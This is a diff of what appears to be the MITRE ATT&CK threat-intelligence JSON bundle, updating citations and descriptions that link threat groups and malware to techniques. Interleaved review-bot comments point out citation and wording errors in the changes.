"external_references": [
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
"description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
"url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
"source_name": "Cybereason Oceanlotus May 2017"
+ },
+ {
+ "source_name": "FireEye APT32 April 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
+ "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020."
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails containing malicious links.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails containing malicious links.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: FireEye APT32 April 2020)",
"id": "relationship--5758382a-2ada-4d05-ad25-8ee802a9e041",
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
"type": "relationship",
- "modified": "2019-07-17T13:11:38.038Z",
+ "modified": "2020-04-29T15:17:18.826Z",
"created": "2019-01-31T01:07:58.708Z"
},
{
@@ -76695,12 +77770,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99"
}
],
- "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--64aab090-e7c2-4114-8c15-49700b611fb8",
@@ -76805,12 +77880,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99"
}
],
- "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--ae38c68d-cc08-4460-9d98-ddf957f837e2",
@@ -76926,16 +78001,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2020-03-17T00:28:01.554Z",
+ "modified": "2020-04-21T23:09:31.032Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -77020,12 +78095,12 @@
"url": "https://github.com/SpiderLabs/Responder"
}
],
- "source_ref": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529"
},
{
"id": "relationship--3427863f-d4c4-4272-ad60-1479e42ed4af",
@@ -77051,22 +78126,27 @@
{
"id": "relationship--d30d8fa0-7f24-41e5-ae8d-e4449e88d2f0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools contained an application to check performance of USB flash drives.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have contained an application to check performance of USB flash drives. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also used malware to scan for removable drives.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.646Z",
+ "modified": "2020-06-22T17:54:15.755Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -77378,22 +78458,22 @@
{
"id": "relationship--d412ff4a-d9d0-44a9-b8b3-36a650f18036",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can scan victim drives to look for specific banking software on the machine to determine next actions. It also looks at browsing history and open tabs for specific strings.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can check for specific files and directories associated with virtualization and malware analysis.(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.064Z",
+ "modified": "2020-06-18T16:05:23.339Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
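Review bot: The RTM description is replaced outright rather than extended: the earlier statement that it scans drives for banking software and inspects browser history, together with its ESET RTM Feb 2017 citation, is removed and only the Unit42 virtualization/analysis-check statement remains, while `target_ref` is unchanged. Elsewhere in this commit (the RTM keystroke and screenshot relationships in the hunks at -77836 and -78132) the new citation is appended and the old text kept, so this looks like an unintended loss unless the earlier claim was found to be wrong. If it was, a sentence in the commit description saying so would help; otherwise keep both statements and both references.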
@@ -77520,12 +78600,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7"
},
{
"id": "relationship--82b679af-7408-4f41-8fc0-5b0cf5993726",
@@ -77823,7 +78903,7 @@
{
"id": "relationship--74486fa3-a5b8-49b2-82b7-0c453b4baf12",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Tor](https://attack.mitre.org/software/S0183) encapsulates traffic in multiple layers of encryption.(Citation: Dingledine Tor The Second-Generation Onion Router)",
+ "description": "[Tor](https://attack.mitre.org/software/S0183) encapsulates traffic in multiple layers of encryption, using TLS by default.(Citation: Dingledine Tor The Second-Generation Onion Router)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -77836,30 +78916,35 @@
],
"source_ref": "tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68",
"relationship_type": "uses",
- "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
"type": "relationship",
- "modified": "2020-03-23T17:00:01.353Z",
+ "modified": "2020-04-29T23:00:47.227Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
"id": "relationship--23e2dc58-4b8d-48d8-82fd-d051892a7d58",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can record keystrokes from both the keyboard and virtual keyboard.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can record keystrokes from both the keyboard and virtual keyboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.071Z",
+ "modified": "2020-06-16T20:51:13.916Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -78059,17 +79144,17 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18"
},
{
"id": "relationship--f22106b0-ca8c-45ad-b20c-5a5ddd7bf886",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) use HTTPS for all command and control communication methods.(Citation: Talos ROKRAT)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) use HTTPS for all command and control communication methods.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
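Review bot: The ROKRAT description rewritten on the new side still reads `[ROKRAT](https://attack.mitre.org/software/S0240) use HTTPS`, a subject–verb disagreement carried over from the old line; since the line is being touched anyway it should become `[ROKRAT](https://attack.mitre.org/software/S0240) uses HTTPS for all command and control communication methods.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)`. The object's `external_references` continue in the next hunk.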
@@ -78078,13 +79163,18 @@
"url": "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
"description": "Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.",
"source_name": "Talos ROKRAT"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T02:29:32.882Z",
+ "modified": "2020-05-21T17:07:02.738Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
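Review bot: The added NCCGroup reference carries a double period in its author field, `"Pantazopoulos, N.. (2018, November 8)"`, while this same commit removes that pattern from other references (the Faou/Boutin entries in the hunks at -75664, -77836 and -78132 and the Kasza/Reichel entries at -77051 and -78424). It should read `"description": "Pantazopoulos, N. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."`. As with the other citation text, fix it upstream if this bundle is refreshed from MITRE's repository.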
@@ -78132,22 +79222,27 @@
{
"id": "relationship--f6d23c00-158e-4e39-bf9b-f18344cd0151",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can capture screenshots.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can capture screenshots.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.057Z",
+ "modified": "2020-06-16T20:51:13.935Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -78245,12 +79340,12 @@
"url": "http://sqlmap.org/"
}
],
- "source_ref": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c"
},
{
"id": "relationship--284ffb1b-ad42-468e-9897-94c25024f0d4",
@@ -78402,16 +79497,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
"type": "relationship",
- "modified": "2020-03-17T00:28:01.552Z",
+ "modified": "2020-04-21T23:09:31.052Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -78424,7 +79519,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -78432,7 +79527,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.374Z",
+ "modified": "2020-06-22T17:54:16.024Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -78445,7 +79540,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416",
"type": "relationship",
- "modified": "2020-03-24T14:48:47.992Z",
+ "modified": "2020-06-30T22:50:06.273Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -78694,7 +79789,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
"type": "relationship",
- "modified": "2019-07-24T14:33:42.577Z",
+ "modified": "2020-07-14T19:42:10.357Z",
"created": "2017-05-31T21:33:27.030Z"
},
{
@@ -78815,16 +79910,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.153Z",
+ "modified": "2020-05-14T15:14:33.569Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
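Review bot: The DustySky external reference loses its `url` on the new side (the `"url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"` line is removed and nothing replaces it), leaving only `source_name` and `description`; what appears to be the same removal is visible at the top of this chunk. Every other reference touched in this commit keeps all three fields, so a consumer that renders citations as links will get a bare text entry here. If the PDF was retired deliberately, a replacement or archived URL would keep the reference resolvable; if not, the `url` line should be restored.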
@@ -79306,12 +80400,12 @@
"url": "https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99"
}
],
- "source_ref": "malware--8d9e758b-735f-4cbc-ba7c-32cd15138b2a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--8d9e758b-735f-4cbc-ba7c-32cd15138b2a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--d8a5e73d-fe56-42d7-a53d-09a90c21308b",
@@ -79552,17 +80646,17 @@
"url": "https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/"
}
],
- "source_ref": "tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4"
},
{
"id": "relationship--6b11697f-be6c-4cd7-b445-4d277a8d7346",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "The [Winnti](https://attack.mitre.org/software/S0141) installer loads a DLL using rundll32.(Citation: Microsoft Winnti Jan 2017)",
+ "description": "The [Winnti for Windows](https://attack.mitre.org/software/S0141) installer loads a DLL using rundll32.(Citation: Microsoft Winnti Jan 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -79657,7 +80751,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e",
"type": "relationship",
- "modified": "2020-03-24T17:26:16.387Z",
+ "modified": "2020-06-24T18:58:35.357Z",
"created": "2017-05-31T21:33:27.025Z"
},
{
@@ -79773,22 +80867,22 @@
{
"id": "relationship--a5d7526f-2b1f-4a69-abc7-926b22bc402b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with HTTPS and also encodes it with a single-byte XOR key.(Citation: Fidelis INOCNATION)",
+ "description": "[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with TLS.(Citation: Fidelis Hi-Zor)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Fidelis INOCNATION",
- "description": "Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.",
- "url": "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL_0.pdf"
+ "source_name": "Fidelis Hi-Zor",
+ "description": "Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.",
+ "url": "https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/"
}
],
"source_ref": "malware--5967cc93-57c9-404a-8ffd-097edfa7bdfc",
"relationship_type": "uses",
- "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
"type": "relationship",
- "modified": "2020-03-23T16:58:56.488Z",
+ "modified": "2020-04-29T22:19:36.097Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -79873,12 +80967,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb491010.aspx"
}
],
- "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa"
},
{
"id": "relationship--fdf9f632-03ce-4e8c-88bf-3798bb7f5ef4",
@@ -79958,7 +81052,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e",
"type": "relationship",
- "modified": "2020-02-05T14:28:08.504Z",
+ "modified": "2020-06-20T22:09:22.696Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -80436,28 +81530,38 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
"type": "relationship",
- "modified": "2019-07-24T19:28:36.032Z",
+ "modified": "2020-07-14T19:49:47.587Z",
"created": "2017-05-31T21:33:27.018Z"
},
{
"id": "relationship--253b56a5-232f-44bc-af4d-85ccc12a0577",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Tools used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) are capable of downloading and executing additional payloads.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "Tools used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) are capable of downloading and executing additional payloads.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.647Z",
+ "modified": "2020-06-22T17:55:32.146Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -80741,7 +81845,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd",
"type": "relationship",
- "modified": "2019-07-24T19:05:56.602Z",
+ "modified": "2020-07-14T19:47:47.045Z",
"created": "2017-05-31T21:33:27.020Z"
},
{
@@ -81035,7 +82139,7 @@
{
"id": "relationship--10c33088-630e-456d-ad0f-8a63be4d3946",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Sykipot](https://attack.mitre.org/software/S0018) communicates using HTTPS and uses a custom encryption cipher to encrypt the HTTPS message body.(Citation: Blasco 2013)",
+ "description": "[Sykipot](https://attack.mitre.org/software/S0018) uses SSL for encrypting C2 communications.(Citation: Blasco 2013)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -81048,9 +82152,9 @@
],
